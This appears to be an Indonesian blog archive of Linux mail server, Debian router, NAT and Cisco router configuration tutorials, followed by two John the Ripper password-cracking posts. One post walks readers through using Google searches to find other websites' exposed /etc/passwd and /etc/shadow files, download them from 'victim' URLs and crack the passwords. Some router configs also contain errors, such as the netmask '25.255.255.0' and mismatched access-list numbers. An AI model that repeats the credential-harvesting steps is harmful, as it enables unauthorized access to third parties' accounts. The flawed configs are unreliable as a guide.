root@bajoel:~#/etc/init.d/postfix restart
root@bajoel:~#postfix check
Jika tidak muncul suatu pesan kesalahan, berarti anda sukses…….
root@bajoel:~#telnet localhost 25
Trying 127.0.0.1…
Connected to localhost.localdomain.
Escape character is ‘^]’.
220 mail.lqman.org ESMTP Postfix (Debian/GNU)

Jika muncul sebagaimana tulisan diatas, berarti postfix anda sudah berjalan lancar…….
Tekanlah tombol Ctrl+] lalu ketik quit untuk keluar dari sesi telnet,
Ambilah napas dalam-dalam, dan lanjutkan perjuangan ;)

Step 6: Mengaktifkan fasilitas authentikasi pada postfix (Auth-SMTP)
Tell Postfix to use SASL/MySQL, dg cara buat file baru dg nama /etc/postfix/sasl/smtpd.conf
root@bajoel:~#touch /etc/postfix/sasl/smtpd.conf
Isi file /etc/postfix/sasl/smtpd.conf dg baris-baris dibawah ini:
root@bajoel:~#mcedit /etc/postfix/sasl/smtpd.conf
pwcheck_method: auxprop
auxprop_plugin: sql
mech_list: plain login cram-md5 digest-md5
sql_engine: mysql
sql_hostnames: 127.0.0.1
sql_user: mailadmin
sql_passwd: passwordanda
sql_database: mail
sql_select: select password from users where email=’%u@%r’
log_level: 7

[Penting] Demi keamanan, pastikan hanya user root & postfix saja yang bisa mengakses file-file yang telah anda buat.
root@bajoel:~#chown root:postfix /etc/postfix/sasl/smtpd.conf
root@bajoel:~#chmod u=rw,g=r,o= /etc/postfix/sasl/smtpd.conf

Mengaktifkan TLS untuk meng-encrypt SMTP traffik, dg cara membuat sertifikat (certificate)
root@bajoel:~#openssl req -new -outform PEM -out /etc/postfix/smtpd.cert -newkey rsa:2048 -nodes -keyout /etc/postfix/smtpd.key -keyform PEM -days 365 -x509

[Penting] Demi keamanan, pastikan hanya user root & postfix saja yang bisa mengakses file-file yang telah anda buat.
root@bajoel:~#chown root:postfix /etc/postfix/smtpd.*
root@bajoel:~#chmod u=rw,g=r,o= /etc/postfix/smtpd.*

Step 7: Mengkonfigurasi courier sebagai server POP3 / IMAP
Edit file /etc/courier/authdaemonrc,
root@bajoel:~#mcedit /etc/courier/authdaemonrc
ubah parameter authmodulelist menjadi :
authmodulelist=”authmysql”
Lalu edit file /etc/courier/authmysqlrc,
root@bajoel:~#mcedit /etc/courier/authmysqlrc
Ubah beberapa parameter, shg menjadi seperti di bawah ini :
MYSQL_SERVER localhost
MYSQL_USERNAME mailadmin
MYSQL_PASSWORD passwordanda
MYSQL_PORT 0
MYSQL_DATABASE mail
MYSQL_USER_TABLE users
#MYSQL_CRYPT_PWFIELD (jadikan baris ini sebagai komentar)
MYSQL_CLEAR_PWFIELD password
MYSQL_UID_FIELD 5000
MYSQL_GID_FIELD 5000
MYSQL_LOGIN_FIELD email
MYSQL_HOME_FIELD “/home/mail”
MYSQL_MAILDIR_FIELD CONCAT(SUBSTRING_INDEX(email,’@',-1),’/',SUBSTRING_INDEX(email,’@',1),’/')
#MYSQL_NAME_FIELD (jadikan baris ini sebagai komentar)

[Penting] Mengedit file authmysqlrc agak sedikit susah, pastikan anda berhati-hati dan tidak membuat kesalahan (jangan memakai tanda SPASI, tetapi gunakan tombol TAB)

Testing…
Restart service courier-authdaemon, dan cobalah untuk mengakses port 110 dengan telnet
root@bajoel:~#/etc/init.d/courier-authdaemon restart
Jika tidak muncul suatu pesan kesalahan, berarti anda sukses…….
root@bajoel:~#telnet localhost 110
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
+OK Hello there.

Router sebagai Gateway Internet di Debian

2008-12-22T03:39:00.000+07:00

1. .:: Set IP Address eth0 dan eth1.

Pengsian berdasarkan asumsi sebagai berikut;
eth0 terhubung ke jaringan lokal / client internet
eth1 terhubung ke Modem ADSL atau WiFi dengan ip 10.1.1.1
Set eth0 dengan ip 192.168.0.254 dan eth1 10.1.1.2

# vi /etc/network/interfaces

auto eth0
iface eth0 inet static
address 192.168.0.254
netmask 255.255.255.0
broadcast 192.168.1.255

auto eth1
iface eth1 inet static
address 10.1.1.2
netmask 255.255.255.0
broadcast 10.1.1.255
gateway 10.1.1.1

2. ..::Install Bind 9 sebagai DNS server.

# apt-get install bind9

setelah selesai terinstall lakukan setting:

# vi /etc/bind/named.conf

masukkan perintah ;

// add entries for other zone below here

zone "domain yang diinginkan" IN {
type master;
file "db.domain";
};

zone "0.168.192.in-addr.arpa" IN {
type master;
file "db.ip";
};

*lalu buat file db.domain dan db.ip , letak posisi file di /var/cache/bind/

.::db.domain

; chuprex.net
$TTL 604800
@ IN SOA ns1.chuprex.net. root.chuprex.net. (
2006020201 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800); Negative Cache TTL
;
@ IN NS ns1
IN MX 10 mail
IN A 192.168.0.254
ns1 IN A 192.168.0.254
mail IN A 192.168.0.2 ; We have our mail server somewhere else.
www IN A 192.168.0.254
client1 IN A 192.168.0.1 ; We connect to client1 very often.

.:: db.ip

; chuprex.net
$TTL 604800
@ IN SOA ns1.chuprex.net. root.chuprex.net. (
2006020201 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800); Negative Cache TTL
;
@ IN NS ns1
IN MX 10 mail
ns1 IN PTR 192.168.0.254
254 IN PTR ns1
254 IN PTR ns1.chuprex.net

** Setting file resolv.conf , posisi di /etc/resolv.conf

nameserver 192.168.0.254
domain chuprex.net
domain www.chuprex.net

**setelah itu restart bind

/etc/init.d/bind9 restart

2. ..:: Sekarang saatnya edit Routing Setting :

**Edit file ipv4_forward untuk memForwardkan ip dari 2 eth.

#vi /etc/network/options

ip_forward = yes
spoofprotect = yes
syncookies = no

**Masukkan rule iptables untuk share internet dari eth1 ke eth0.

#iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE

untuk mempermanenkan rule iptables, jangan lupa menyimpannya.

#iptables-save

Sekian aja ya, setting router sederhana sudah selesai. Ooops, ternyata ada yg tertinggal.

**:: Restart setting network anda.

#/etc/init.d/networking restart

Network Address Translation (NAT)

2008-12-22T03:30:00.000+07:00

nat.gif

Keterbatasan alamat IPv.4 merupakan masalah pada jaringan global atau Internet. Untuk memaksimalkan penggunakan alamat IP yang diberikan oleh Internet Service Provider (ISP) dapat digunakan Network Address Translation atau NAT. NAT membuat jaringan yang menggunakan alamat lokal (private), alamat yang tidak boleh ada dalam tabel routing Internet dan dikhususkan untuk jaringan lokal/intranet, dapat berkomunikasi ke Internet dengan jalan ‘meminjam’ alamat IP Internet yang dialokasikan oleh ISP. Atau dapat juga digunakan untuk koneksi jaringan antar organisasi yang berbeda yang tidak ingin alamat jaringannya diketahui oleh organisasi lain.

Dengan NAT, jaringan internal/lokal, tidak akan terlihat oleh dunia luar/internet. IP lokal yang cukup banyak dapat dilewatkan ke Internet hanya dengan melalui translasi ke satu IP publik/global. Sehingga dengan kata lain bahwa NAT sebagai jembatan IP lokal untuk keluar ke IP internet/publik.

Konfigurasi Frame Relay dengan Cisco Router

2008-12-22T03:29:00.001+07:00

Konfigurasi LAN di Head Office:

Network : 10.10.10.0
Subnet Mask : 255.255.255.0
Jumlah IP Host : 10.10.10.1 sd 10.10.10.254 (254 IP Addresses)
IP PC Server : 10.10.10.2
PC Client : 10.10.10.4 & 10.10.10.5
IP Ethernet Router : 10.10.10.1

Konfigurasi LAN Remote A/Branch Office:

Network : 10.10.11.0
Subnet Mask : 255.255.255.0
Jumlah IP Host : 10.10.11.1 sd 10.10.11.254 (254 IP Addresses)
PC Client : 10.10.11.2 & 10.10.11.4
IP Ethernet Router : 10.10.11.1

Konfigurasi LAN Remote B/Branch Office:

Network : 10.10.15.0
Subnet Mask : 255.255.255.0
Jumlah IP Host : 10.10.15.1 sd 10.10.15.254 (254 IP Addresses)
PC Client : 10.10.15.2 & 10.10.15.4
IP Ethernet Router : 10.10.15.1

Gambar Konfigurasi:

frame-relay.JPG

Konfigurasi Router Cisco Head Office

Konfigurasi Ethernet

RouterHQ#config term
RouterHQ(config)#interface fastethernet 0/0
RouterHQ(config-if)#ip address 10.10.10.1 255.255.255.0
RouterHQ(config-if)#speed auto
RouterHQ(config-if)#duplex auto
RouterHQ(config-if)#exit

Konfigurasi WAN Serial
Sub-interface for point-to-point connection

RouterHQ#config term
RouterHQ(config)#interface serial 0
RouterHQ(config-if)#encapsulation Frame Relay
RouterHQ(config-if)#Frame Relay LMI-type ansi

RouterHQ(config)#interface serial0.1 point-to-point
RouterHQ(config-subif)#ip address 192.168.1.1 255.255.255.252
RouterHQ(config-subif)#frame-relay interface-dlci 50
(contoh jika koneksi ke remote A menggunakan DLCI 50)

RouterHQ(config)#interface serial0.2 point-to-point
RouterHQ(config-subif)#ip address 192.168.1.5 255.255.255.252
RouterHQ(config-subif)#frame-relay interface-dlci 100
(contoh jika koneksi ke remote B menggunakan DLCI 100)

Konfigurasi Routing Statik ke Remote A dan Remote B

RouterHQ(config)#ip route 10.10.11.0 255.255.255.0 s0.1
RouterHQ(config)#ip route 10.10.15.0 255.255.255.0 s0.2

=========================================

Konfigurasi Router Cisco Remote A

Konfigurasi Ethernet

RouterA#config term
RouterA#(config)#interface fastethernet 0/0
RouterA#(config-if)#ip address 10.10.11.1 25.255.255.0
RouterA#(config-if)#speed auto
RouterA#(config-if)#duplex auto
RouterA#(config-if)#exit

Konfigurasi WAN Serial
Sub-interface for point-to-point connection

RouterA(config)#interface serial 0
RouterA(config-if)#encapsulation Frame Relay
RouterA(config-if)#Frame Relay LMI-type ansi
RouterA(config-if)#exit
!
RouterA(config)#interface serial0.1 point-to-point
RouterA(config-subif)#ip address 192.168.1.2 255.255.255.252
RouterA(config-subif)#frame-relay interface-dlci 50

Routing Statik ke Head Office

RouterA(config)#ip route 10.10.10.0 255.255.255.0 s0.1

=========================================

Konfigurasi Router Cisco Remote B

Konfigurasi Ethernet

Konfigurasi Ethernet

RouterB#config term
RouterB#(config)#interface fastethernet 0/0
RouterB#(config-if)#ip address 10.10.15.1 25.255.255.0
RouterB#(config-if)#speed auto
RouterB#(config-if)#duplex auto
RouterB#(config-if)#exit

Konfigurasi WAN Serial
Sub-interface for point-to-point connection

RouterB(config)#interface serial 0
RouterB(config-if)#encapsulation Frame Relay
RouterB(config-if)#Frame Relay LMI-type ansi
RouterB(config-if)#exit
!
RouterB(config)#interface serial0.1 point-to-point
RouterB(config-subif)#ip address 192.168.1.6 255.255.255.252
RouterB(config-subif)#frame-relay interface-dlci 100

Routing Statik ke Head Office
RouterB(config)#ip route 10.10.10.0 255.255.255.0 s0.1

=========================================

Hasil Show Running Configuration

RouterHQ#sh running
!

inteface FastEthernet 0
ip address 10.10.10.1 25.255.255.0
speed auto
duplex auto

inteface serial 0
encapsulation Frame-Relay
Frame Relay LMI-type ansi

interface serial 0.1 point-to-point
ip address 192.168.1.1 255.255.255.252
frame-relay interface-DLCI 50

interface serial 0.2 point-to-point
ip address 192.168.1.5 255.255.255.252
frame-relay interface-DLCI 100

!

ip classless
ip route 10.10.11.0 255.255.255.0 s0.1
ip route 10.10.15.0 255.255.255.0 s0.2

RouterA#sh running
!

inteface FastEthernet 0
ip address 10.10.11.1 25.255.255.0
speed auto
duplex auto

inteface serial 0
encapsulation Frame-Relay
Frame Relay LMI-type ansi

interface serial 0.1 point-to-point
ip address 192.168.1.2 255.255.255.252
frame-relay interface-DLCI 50

!
ip classless
ip route 10.10.10.0 255.255.255.0 s0.1

RouterB#sh running
!

inteface FastEthernet 0
ip address 10.10.15.1 25.255.255.0
speed auto
duplex auto

inteface serial 0
encapsulation Frame-Relay
Frame Relay LMI-type ansi

interface serial 0.1 point-to-point
ip address 192.168.1.6 255.255.255.252
frame-relay interface-DLCI 100

!
ip classless
ip route 10.10.10.0 255.255.255.0 s0.1

Konfigurasi NAT pada Router Cisco 3640

2008-12-22T03:25:00.000+07:00

Network Address Translation adalah suatu cara untuk menghubungkan jaringan private ke internet menggunakan satu IP public. Tulisan ini akan menjelaskan cara mengkonfigurasi NAT menggunakan Cisco 3640.

Konfigurasi jadingan adalah:
1. FastEthernet1 (f1/0) dengan IP 192.168.0.1. Interface ini terhubung ke jaringan yang akan di NAT

2. FastEthernet0 (f0/0) dengan IP 152.118.99.52. Interface ini terhubung ke internet.

Masuk ke mode privileged
config t

Pilih interface yang langsung terhubung dengan NAT, dan definisikan network pada jaringan ini sebagai network yang akan di NAT.
#int f1/0
#ip nat inside

Pilih interface yang langsung terhubung dengan internet, dan definisikan network ini sebagai network yang terhubung ke internet.
#int f0/0
#ip nat outside

Konfigurasikan access list untuk digunakan dalam proses NAT
access-list 2 permit 192.168.0.0 0.0.0.255

Konfigurasikan router agar me-NAT semua paket dari 192.168.0.0 ke 152.118.99.52
ip nat inside source list 10 interface f0/0 overload

Konfigurasi selesai. Cek apakah host pada jaringan 192.168.0.0 dapat terhubung ke internet. Cek juga konfigurasi NAT pada router dengan perintah
show ip nat translations *

Contoh Konfigurasi Router Cisco

2008-12-22T03:24:00.000+07:00

Untuk melakukan konfigurasi pertama kali pada router anda harus menyambungkan router tersebut dengan komputer anda menggunakan kabel console. Kemudian router tersebut bisa di konfigurasi melalui hyper terminal dengan setting default.

Berikut konfigurasi yang dapat kita lakukan:

undefinedPada Router A:
Router A> ena /*masuk ke previleged mode
Router A # config t /*masuk ke global configuration mode
Router A (Config)# interface f0/0

/*masuk ke mode dimana kita bisa mengatur interface tertentu (dalam hal ini fast ethernet 0/0)

Router A (Config-If)# description Terhubung ke jaringan lokal

/*keterangan tentang terhubung kemanakah interface tersebut, untuk memudahkan kita untuk cepat mengambil tindakan ketika sesuatu terjadi

Router A (Config-If)# ip address 192.168.1.1 255.255.255.0

/*setting ip address dan subnet mask

Router A (Config-If)# no shut

/*memerintahkan agar interface tersebut menyala (change state to up)

Router A (Config-If)# exit

Nah, ini untuk setting interface serial 2/0 yang terhubung dengan Router B,
Router A (Config)# interface s2/0
Router A (Config-If)# description Terhubung ke Router B
Router A (Config-If)# ip address 202.100.100.1 255.255.255.0
Router A (Config-If)# no shut
Router A (Config-If)# end
Router A# sh run

/*melihat settingan yang sudah kita lakukan

Router A# copy run start

/*mengopi setting yang sudah kita lakukan ke dalam NVRAM (start-up config), sehingga ketika router tersebut di restart settingannya masih tetap sama.

Router A# exit
Router A> exit

Pada Router B:
Router B> ena
Router B # config t
Router B (Config)# interface f0/0
Router B (Config-If)# description Terhubung ke jaringan lokal
Router B (Config-If)# ip address 192.168.2.1 255.255.255.0
Router B (Config-If)# no shut
Router B (Config-If)# exit
Router B (Config)# interface s2/0
Router B (Config-If)# description Terhubung ke Router A
Router B (Config-If)# ip address 202.100.100.2 255.255.255.0
Router B (Config-If)# clock rate 64000

/*Perlu dilakukan setting clock rate karena Router B menggunakan kabel DCE (ketika menghubungkan antara 2 router diperlukan kabel DTE dan DCE), angka 64000 merupakan default clock rate.

Router B (Config-If)# no shut
Router B (Config-If)# end
Router B# sh run
Router B# copy run start
Router B# exit
Router B> exit

Agar jaringan pada gambar diatas terkoneksi dengan baik (dapat dicoba dengan perintah ping), setelah setting router tersebut dilakukan masing-masing komputer perlu di set ip address dan default gatewaynya ke masing-masing router tersebut.

Kompie A:
Ip Address: 192.168.1.2
Subnet Mask: 255.255.255.0
Default Gateway: 192.168.1.1 (Router A)

Kompie B:
Ip Address: 192.168.2.2
Subnet Mask: 255.255.255.0
Default Gateway: 192.168.2.1 (Router B)

Selain itu jangan lupa konfigurasi routing protocol pada kedua router tersebut (static ataupun dynamic seperti RIP, RIPv2, IGRP, OSPF, EIGRP,IS-IS, dsb).

Cisco Routing Basic

2008-12-22T03:23:00.000+07:00

ciscologo1.gifRouting, adalah sebuah proses untuk meneruskan paket-paket jaringan dari satu jaringan ke jaringan lainnya melalui sebuah internetwork. Routing juga dapat merujuk kepada sebuah metode penggabungan beberapa jaringan sehingga paket-paket data dapat hinggap dari satu jaringan ke jaringan selanjutnya. Untuk melakukan hal ini, digunakanlah sebuah perangkat jaringan yang disebut sebagai router. Router-router tersebut akan menerima paket-paket yang ditujukan ke jaringan di luar jaringan yang pertama, dan akan meneruskan paket yang ia terima kepada router lainnya hingga sampai kepada tujuannya.[Sumber: Wikipedia]

Karena kita sudah tau apa yang di maksud dengan routing dan bagaimana cara kerjanya. Sekarang kita langsung saja menuju ke perangkat routingny, yang di seb utut dengan route. Router yang kita gunakan sekarang adalah router cisco. Kenapa saya menggunakan router cisco? karena router cisco yang sekarang banyak di gunakan oleh orang-orang dan juga saya hanya bisa condigure router cisco doank. Kalau yang lain masih belum saya belai-belai :D .

Baik kita langsung saja mulai acara ngoprek router kita. Pertama yang harus anda lakukan adalah menancapkan router kita ke komputer. Nah sekarang kita coba dengan menghubungkan2 komputer dan 2 router. tapi untuk sekarang saya hanya bisa menjelaskan menjelaskan langkah-langkah bagaimana menghubungkan 2 router terdahulu. Karena kan sekarang kita mempelajari materi dasarnya dahulu.

Setelah router sudah tertancap dengan baik sekar ang anda masuk ke HyperTerminal yang ada di Start –>> All Programs –>> Accessories –>> Communications –>> HyperTerminal. Coba anda masuk ke program HyperTerminal itu. Setelah masuk maka anda akan di tanyakan mengenai nama configurasi router yang akan kita pakai,sebagai contoh anda masukan nama route. Kemaudian anda klik OK untuk melanjutkan. Kemudian dia akan menanyakan mau di koneksikan kemana HyperTerminal ini, dibagian Connecting useing anda pilih di port mana router anda di masukan, sebagai contoh anda pilih yang Com3, setelah itu anda klik OK untuk melanjutkan. Kemudian di bagian ini anda klik saja restore default kemudian klik ok. Kemudian setelah itu akan muncul teks beberapa baris dan anda tekan enter untuk memulai perjuangan kita di bagian oprek Cisco ini.

OK kita ga usah panjang lebar lagi sekarang anda sudah masuk ke dalam command router, tempat dimana anda bisa meng-konfigurasi router anda. Anda sekarang berada dalam posisi user mode, user mode itu hanya user biasa yang ga bisa anda jadikan tempat configurasi :D. jika anda mau konfigurasi anda di haruskan masuk ke dalam privileged mode, yaitu user yang memegang penuh kenda di dalam router cisco. Untuk masuk ke dalah privileged mode anda tinggal mengetikan enable kemudian tekan enter, maka anda akan masuk ke privileged mode. Lihat peredaan user mode dan privileged mode:

User mode:
Router>
privileged mode:
Router#

Jadi perbedaannya hanya di bagian ujung saja, kalau user mode menggunakan tanda (>) sedangkan Privilaged mode menggunakan tanda (#). Berikutanya saya hanya akan menjelaskan secara singkat mengenai configurasi router, saya hanya akan menjelaskan langkah2 nya saja. Kalau terlalu detile saya juga susah mengetikannya. :D

Ganti Hostname[nama router]:

Router> enable
Router# configure terminal
Router(config)#
Router(config)# hostname router1
router1(config)#

Memberi password router anda:

router1(config)# enable password ccna
router1(config)# enable secret cisco

Memberi IP router anda:

router1(config)# interface ethernet0
router1(config-if)# ip address 130.20.10.1 255.255.255.0
router1(config-if)# no shutdown
*Karena anda menggunakan 2 port jadi sekarang langsung edit port serial 0 nya
router1(config-if)# int s0
router1(config-if)# ip address 135.20.10.1 255.255.255.0
router1(config-if)# no shut

Coba anda keluar dan masuk lagi ke dalam router anda, sekaligus untunk mengetes password anda:

router1(config-if)# ctrl-z
router1#
router1# logout
*Masuk lagi
router1> enable
password: cisco
router1#

Memeriksa status atau kondisi dari tiap-tiap interface yang telah di konfigurasi:

router1# show ip interface brief
*kalau mau yang lebih detile ketik:
router1# show interfaces

Mengetahui konfigurasi yang aktif di dalam DRAM (dynamic random access memory):

router1# show running-config

Mengetahui konfigurasi yang sudah tersimpan di dalam NVRAM:

router1# show startup-config

Menyalin konfigurasi yang sudah aktif ke dalam NVRAM:

router1# copy running-config startup-config

Coba anda sekarang cek NVRAMnya:

router1# show startup-config

Untu mengetahui jenis apa router yang kita gunakan:

router1# show version

Untuk mengetahui protokol apa saja yang terpasang di dalam router kita:

router1# show protocols

Sekarang kita masuk ke router 2, jadi saya ga perlu jelasin lagi ya. Saya hanya kasih langkah-langkahnya saja:

Router> enable
Router# configure terminal
Router(config)#
Router(config)# hostname ccna2
router2(config)# enable secret cisco
*Karena yang di gunakan adalah Fast Ethernet jadi aga lain di sini:
router2(config)# interface Fa 0/0
router2(config-if)# ip address 130.20.10.2 255.255.255.0
router2(config-if)# no shut
router2(config-if)# ctrl-z
router2# show ip interface brief
*Kemudian anda lakukan ping ke router1 dari Fast Ethernet ke Ethernet yang ada di router1 (130.20.10.1)
router2# ping 130.20.10.1

Harus sampe sukses. Kalau tidak anda ulang dari awal. Kalau sukses keterangan yang akan keluar adalah kaya gini:

router2#ping 130.20.10.1
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 130.20.10.1, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/2/4 ms

kalau gagal dan anda harus ulangi konfigurasi adalah kaya gini:

router1#ping 130.20.10.1
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 130.20.10.1, timeout is 2 seconds:
…..
Success rate is 0 percent (0/5), round-trip min/avg/max = 1/2/4 ms

Dasar-Dasar Konfigurasi Router Cisco 1

2008-12-22T03:21:00.000+07:00

1. Setelah Router boot up, pertama kali kita akan berada pada mode user EXEC. Sebelumnya mungkin kita akan menjumpai initial setup untuk router yang belum disimpan konfigurasinya ke dalam NVRAM.

Router>
2. Menampilkan informasi flash.

Router> show flash
3. Menampilkan versi IOS dan informasi penting lainnya.

Router> show version
4. Menampilkan informasi konfigurasi yang tersimpan di RAM.

Router> show running-config
5. Menampilkan informasi konfigurasi yang tersimpan di NVRAM.

Router> show startup-config
6. Selanjutnya untuk masuk ke mode Privileged EXEC.

Router> enable
Router#
7. Masuk ke mode Global Configuration.

Router# configure terminal
Router(config)#
8. Mengganti/Merubah nama Router.

Router(config)# hostname Jogja
Jogja(config)#
9. Melakukan konfigurasi password Console (Line Console).

Jogja(config)# line console 0
Jogja(config-line)# password cisco
Jogja(config-line)# login
Jogja(config-line)# exit
Jogja(config)#
10. Melakukan konfigurasi password Virtual Terminal Line (Telnet).

Jogja(config)# line vty 0
Jogja(config-line)# password cisco
Jogja(config-line)# login
Jogja(config-line)# exit
Jogja(config)#
11. Melihat password yang belum dienkripsi.

Jogja# show running-config
line con 0
password cisco
login
line aux 0
line vty 0 4
password cisco
login
12. Melakukan konfigurasi password untuk masuk ke mode Privileged EXEC.

Jogja(config)# enable password ccna
13. Melakukan enkripsi password untuk Console dan Virtual Terminal Line (Telnet) dengan password-encryption.

Jogja(config)# service password-encryption
14. Melakukan enkripsi password untuk mode Privileged EXEC dengan md5.

Jogja(config)# enable secret class

Cracking Password Dengan John The Ripper

2008-12-22T03:20:00.000+07:00

md5 hash merupakan salah satu jenis password yang di simpan pada OS Windows yang kata orang sih gampang buat di crack dengan berbagai password cracker yang dengan mudah dapat ditemukan di mana-mana. lagi-lagi saya sendiri belum mencoba artikel ini karena keterbatasan waktu dan tugas saya di sekolah saya membuat saya menyerah pada keadaan GBU :)

Cracking Password Dengan John The Ripper

: Table OF contENTS :
———————
:: [1]. PREFACE
:: [2]. Mencari Target
:: [3]. Password Cracking
:: [4]. Penutup
:: [+] Shoutz

::—||-[1]. PREFACE
———————

John The Ripper?? Siapa sich yang nggak kenal dengan tools Cracking yang kaya fitur ini.. ;) Walaupun usianya sudah uzur, tapi kemampuannya tetap bisa diandalkan. Mungkin tutorialnya dah lama yach.. sorry nich, kebetulan lagi banyak yang request, so bagi yang udah bosan dengan tutorial yang berbau John The Ripper.. ngapain juga masih baca sampai baris ini!! ;P

::—||-[2]. Mencari Target
—————————-

Sekarang kita akan mencari target. Biasa.. kita mampir ke rumahnya paman
Google (google.com). Ketik keyword berikut lalu klik tombol search:

Inurl:/etc/passwd/

Eits.. tunggu dulu.. maksudnya apaan nich?? Okay, gue jelasin yach…. Untuk melakukan password cracking, kita khan harus tau dimana file password yang mau di-crack. Naah, target kita kali ini adalah sistem operasi Linux.

Pada OS Linux, file passwordnya berada di lokasi /etc/passwd. Sedangkan shadow passwordnya berada di /etc/shadow (baca arsip lama mengenai Shadow Password). Dengan bantuan paman google, kita berusaha mencari file password dengan cara mengetikkan keyword diatas.

Well.. gimana nich hasil pencariannya? pasti muncul banyak khan.. ;) Klik salah satu link, dan isi file /etc/passwd akan ditampilkan. oleh browser. Copy- pastekan isi file tersebut pada notepad dan simpan dengan nama password.txt.

Sekarang, kita akan melihat isi file shadow passwordnya.Misalkan url situs korban yang anda buka tadi adalah:

http://www.spyrozone.tk/spyrokid/config/etc/passwd-

Ubahlah alamat itu pada address bar menjadi:

http://www.spyrozone.tk/spyrokid/config/etc/shadow-

Naah, kini isi dari file etc/shadow akan ditampilkan oleh browser. Copy- paste isi file tersebut pada notepad, lalu simpan dengan nama shadow.txt.

::–||-[3]. Password Cracking
—————————–

Eh, udah punya John The Ripper belum?? Kalau belum, kamu bisa download John The Ripper di member area www.spyrozone.tk. Kalau sudah, saatnya kita melakukan password craCKING!

Extract file hasil downloadnya ke suatu folder lalu buka lewat MSDOS. Biar gampang,copy juga file password.txt dan shadow.txt tadi ke directory yang sama dengan John The Ripper. Setelah itu, gabungkan file password.txt dan file shadow.txt dengan menggunakan program unshadow.exe milik John The Ripper. Perintahnya ialah:

unshadow password.txt shadow.txt >> crack.txt

Setelah itu, kita gunakan john-mmx.exe untuk mengCRACK file crack.txt dengan menggunakan perintah:

john-mmx crack.txt

Tunggu dech.. lamanya hasil crack yang keluar tergantung dari seberapa panjang password korban dan seberapa rumit karakter (special characters) yang digunakan dalam password. Jika proses cracking berhasil, akan muncul:

username (password)

::–||-[4]. Penutup
————
Sekian dulu dech, sebagai antisipasi agar anda tidak menjadi korban, baca ajah tulisan-tulisan saya yang terdahulu seputar keamanan account.

Tutorial John The Ripper (JTR)

2008-12-22T03:18:00.000+07:00

Pengenalan
----------
John the Ripper merupakan password cracker yang cepat. JTR tersedia
pada berbagai
platform baik *nix, DOS, win32. Tujuan utamanya adalah mendeteksi
kelemakan
password pada Unix. Tetapi JTR juga dapat mengcrack password pada Win
NT/2000/XP
yang berbentuk LM hashes.

Bagi yang belum mempunyai JTR, anda dapat download disini:
- http://www.openwall.com/john/

Ada beberapa hal penting pada JTR
[passfile] - Nama dari password file anda
[wordlist] - Kumpulan kata-kata
[output] - Hasi decrypt password
[session name] - Nama yang anda gunakan untuk menyimpan session

-- contoh Pasword File: passwd.txt --
root:VwL97VCAx1Qhs:0:0:root:/root:/bin/bash
user:aH0qcQOVz7e0s:515:100:user:/home/user:/bin/bash
lin:iWuSGrtezXz0E:515:100:lin:/home/lin:/bin/bash
-- contoh Pasword File: passwd.txt --

Note: Simpan [passfile] di folder yang sama dengan file execute JTR
Hal ini untuk mempermudah penggunaan JTR :)

Terdapat 3 mode pada JTR untuk mendecrypt password
1. Single Mode
Pada Single Mode, JTR akan berusaha mencari Password yang paling
lemah dari seluruh password. Cara ini merupakan cara yang paling
cepat.

Syntax single mode
- john -single [passfile]
atau
- john -si [passfile]

Co: Anda mempunyai password file passwd.txt
Maka penggunaannya : john -si passwd.txt

2. Wordfile Mode
Wordfile Mode merupakan cara tercepat ke 2. Wordfile Mode membutuhkan
kamus kata-kata.

Wordfile syntax
john -wordfile:[wordlist] [passfile]
atau
john -w:[wordlist] [passfile]

Co: Anda mempunyai password file passwd.txt dan mempunyai kamus kata words.lst
john -w:words.lst passwd.txt

3. Incremental Mode
Incremental Mode merupakan cara yang paling lambat dan berusaha untuk
mendecrypt semua password, akan memakan waktu berhari-hari, bermingu-minggu,
bahkan berbulan-bulan (berlebihan gak ya :p). Sebaiknya anda menggunakan
cara ini apabila 2 cara sebelumnya gagal.
Terdapat 4 perintah dasar dalam penggunaannya
a. digits: Akan mencoba mendecrypt semua password dengan karakter angka
b. alpha: Akan mencoba mendecrypt semua password dengan karakter huruf
c. all: Akan mencoba mendecrypt semua password dengan semua karakter
termasuk karakter spesial, co: @!^&?
d. tidak memilih mode: Akan mencoba mendecrypt password dengan segala cara

Syntax:
john -i [passfile]
john -i:DIGITS [passfile]
john -i:ALPHA [passfile]
john -i:ALL [passfile]

Co: Anda mempunyai password file passwd.txt
john -i passwd.txt
john -i:DIGITS passwd.txt
john -i:ALPHA passwd.txt
john -i:ALL passwd.txt

Mode lainnya pada JTR
- Show Mode
Setelah anda mendapatkan password yang telah di decrypt, anda dapat menyimpannya
pada file tertentu.

Syntax:
john -show [passfile]>[output]

Co: Anda mempunyai password file passwd.txt dan ingin menghasilkan output hasil.txt
john -show passwd.txt>hasil.txt

Anda juga dapat melihat langsung hasil decrypt dari JTR.

Syntax:
john -show [passfile]

Hasilnya terlihat seperti berikut:

root:root:0:0:root:/root:/bin/bash
user:company:515:100:user:/home/user:/bin/bash
lin:rootme:515:100:lin:/home/lin:/bin/bash
3 passwords cracked, 0 left

- Menghentikan JTR
Untuk menghentikan JTR anda dapat menekan CTRL+C

- Rules
Digunakan bersamaan dengan wordfile mode, tanpa rules JTR hanya akan mencoba
kata-kata yang terdapat pada wordlist. Apabila anda mengaktifkannya maka JTR
akan mencoba variasi dari kata2 pada wordlist.

Syntax
john w:[wordlist] -rules [passfile]

- Session & Restore
Mendecrypt password dapat memakan waktu sangat lama. Anda dapat menghentikan
JTR dengan CTRL+C, kemudian di lain waktu dapat dilanjutkan kembali dengan
syntax restore. Dengan melakukan hal tersebut akan membawa JTR kembali ke
session terakhir.

Syntax
john -restore
john -restore:[session name]
john -session:[session name]

- Saat melakukan cracking, JTR hanya menampilkan kursor yang berkedip.Apabila
anda ingin melihat sampai dimana JTR bekerja, anda dapat menekan "sembarang
tombol", JTR akan menampilkan status terakhir.

- Semua password yang pernah di crack disimpan JTR di john.pot

Anda bisa mendapatkan Wordfile di site-site berikut:
1. http://www.openwall.com/passwords/wordlists/

2. http://www.sparkleware.com/lists.html

3. http://ftp.cerias.purdue.edu/pub/dict/local/

4. ftp://sable.ox.ac.uk/pub/wordlists/

5. http://www.theargon.com/archives/wordlists/theargonlists/

Referensi AKA Bacaan:
1. Dokumentasi JTR
